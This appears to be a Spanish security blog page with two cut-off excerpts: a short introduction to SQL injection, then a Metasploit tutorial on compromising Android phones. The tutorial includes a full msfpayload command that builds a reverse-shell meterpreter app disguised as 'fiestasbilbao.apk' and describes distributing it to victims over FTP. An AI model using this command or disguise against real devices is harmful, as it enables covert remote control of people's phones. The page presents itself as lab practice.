Según Wikipedia Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar operaciones sobre una base de datos... La inyección SQL esta en la cima de el delito en la red, por el valor de las bases de datos que están en la red (empresas,tiendas,banca online...) ahí se almacenan todo tipo de credenciales, desde nombres de usuario hasta números bancarios. Como sabréis, las inyecciones SQL en algunos casos se pueden realizar desde el propio navegador, inyectando caracteres en una consulta desde la pagina web hasta la base de datos, que generen un tipo de error, esa sera la parte del código SQL vulnerable, es decir inyectaremos código SQL intruso contra ese parámetro "mal configurado" . ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y
Como ya sabéis, metasploit es la herramienta de explotación de vulnerabilidades por excelencia, en esta ocasión vamos a "atacar" dispositivos móviles personales con sistema Android. El escenario es el siguiente, el equipo atacante (Kali Linux), un servidor FTP para que nuestras victimas puedan descargar fácilmente la App y las victimas (terminales Android). Comencemos! es esencial tener instalado metasploit, en mi caso la distribución Kali linux lo trae integrado, así que procedemos, empezamos con el payload. Crear el payload es muy sencillo, basta con introducir esta linea en una terminal. msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8888 R> fiestasbilbao.apk Esto indica lo siguiente, la App lleva la instrucción de iniciar una sesión meterpreter contra 192.168.1.11 por el puerto 8888, la R indica que la salida es en formato .apk, escogemos el nombre e introducimos la orden, tardará un poco, una vez finalice podremos observar nu